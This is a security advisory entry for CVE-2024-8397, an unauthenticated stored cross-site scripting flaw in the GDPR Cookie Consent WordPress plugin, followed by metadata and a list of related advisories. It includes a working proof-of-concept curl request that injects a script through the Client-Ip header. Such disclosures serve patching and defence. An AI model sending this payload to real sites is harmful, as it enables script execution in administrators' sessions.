GDPR Cookie Consent <= 2.6.0 – Unauthenticated Stored XSS | CVE 2024-8397 | Plugin Vulnerabilities

Description

The plugin does not properly sanitize and escape the IP headers when logging them, allowing visitors to conduct Stored Cross-Site Scripting attacks. The payload gets triggered when an admin visits the 'Consent report' page and the malicious script is executed in the admin context.

Proof of Concept

Run this curl command:

```
curl -X POST -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Client-Ip: <script>alert(1)</script>." --data "action=wt_log_visitor_action" "https://example.com/wp-admin/admin-ajax.php"
```

As an admin, visit the "Consent Report" page to see the payload executed.

Affects Plugins

webtoffee-gdpr-cookie-consent

Fixed in 2.6.1

References

CVE

YouTube Video

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Zitec/Teodora Jilaveanu

Submitter

Zitec/Teodora Jilaveanu

Submitter website

https://zitec.com/

Verified

Yes

WPVDB ID

847fbf5d-f7cf-49fd-88bc-d7fa2a8110bd

Timeline

Publicly Published

2024-07-24 (about 1 year ago)

Added

2024-09-16 (about 1 year ago)

Last Updated

2024-09-16 (about 1 year ago)

Other

Published

Title

Published

2025-03-12

Title

MicroPayments < 3.2.5 - Reflected Cross-Site Scripting

Published

2025-01-16

Title

Mindmeister Shortcode <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-01-06

Title

CC Canadian Mortgage Calculator < 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-03

Title

Survey Maker < 5.1.3.6 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2023-11-23

Title

eDoc Employee Job Application <= 1.13 - Reflected Cross-Site Scripting